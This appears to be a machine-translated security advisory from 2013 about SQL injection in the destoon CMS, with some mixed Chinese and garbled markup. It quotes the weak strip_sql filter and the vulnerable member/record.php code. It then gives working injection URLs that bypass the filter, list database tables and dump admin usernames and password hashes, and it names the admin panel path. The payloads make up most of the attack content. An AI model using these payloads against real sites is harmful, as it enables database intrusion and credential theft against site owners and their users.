destoon full version SQL injection vulnerability-vulnerability warning-the black bar safety net

2013-10-01T00:00:00
ID MYHACK58:62201340780
Type myhack58
Reporter 90sec 西毒
Modified 2013-10-01T00:00:00

Description

在 include/global.func.php in strip_sql function to pass the incoming value for the filter, but we can bypass this limit, to achieve the full version of the injected

function strip_sql($string) {

$search = array("/union[\s|\t]/i","/select[\s|\t]/i","/update[\s|\t]/i","/outfile[\s|\t]/i","/ascii/i","/[\s|\t]or[\s|\t]/i","/\/\*/i");

$replace = array('union ','select ','update ','outfile ','ascii ',' or ', ");

return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);

}

在 member/record.php in

<? php

require 'config.inc.php';

require '../common.inc.php';

require DT_ROOT.'/ module/'.$ module.'/ record.inc.php';

?& gt;

调用 了 record.inc.php

switch($action) {

case 'pay':

$MODULE[-9]['name'] = $L['resume_name'];

$MODULE[-9]['islink'] = 0;

$MODULE[-9]['linkurl'] = $MODULE[9]['linkurl'];

isset($fromtime) or $fromtime = ";

isset($totime) or $totime = ";

isset($dfromtime) or $dfromtime = ";

isset($dtotime) or $dtotime = ";

isset($mid) or $mid = 0;

isset($currency) or $currency = ";

$module_select = module_select('mid', $L['module_name'], $mid);

if($keyword) $condition .= "AND title LIKE '%$keyword%'";

if($fromtime) $condition .= "AND paytime>". (strtotime($fromtime.' 0 0:0 0:0 0'));

if($totime) $condition .= "AND paytime<". (strtotime($totime.' 2 3:5 9:5 9'));

if($mid) $condition .= "AND moduleid=$mid";

if($itemid) $condition .= "AND itemid=$itemid";

....//

Where$mid is not filtered, cause we can inject

But the front has anti-injection treatment?

See our how to bypass the injection of regular

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union///select///1,2,password,username,5,6,7,8,9 from destoon_member where admin=1-- a

Look at it this is not can?

This will achieve can bypass the regular.

Current. The prefix is certainly a change,I see the use of

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union///select///1,2,GROUP_CONCAT(DISTINCT+table_name),4,5,6,7,8,9+from+information_schema. columns+where+table_schema=database()--%20a

To get the prefix. Use

http://www.myhack58.com/member//record.php?action=pay&mid=-1+union///select///1,2,concat(username,0x3A,password),4,5,6,7,8,9%20from%20destoon_member%20where%20admin=1--%20a

To obtain an account number and password, the ciphertext is md5(md5(psw))type, 后台貌似为admin.php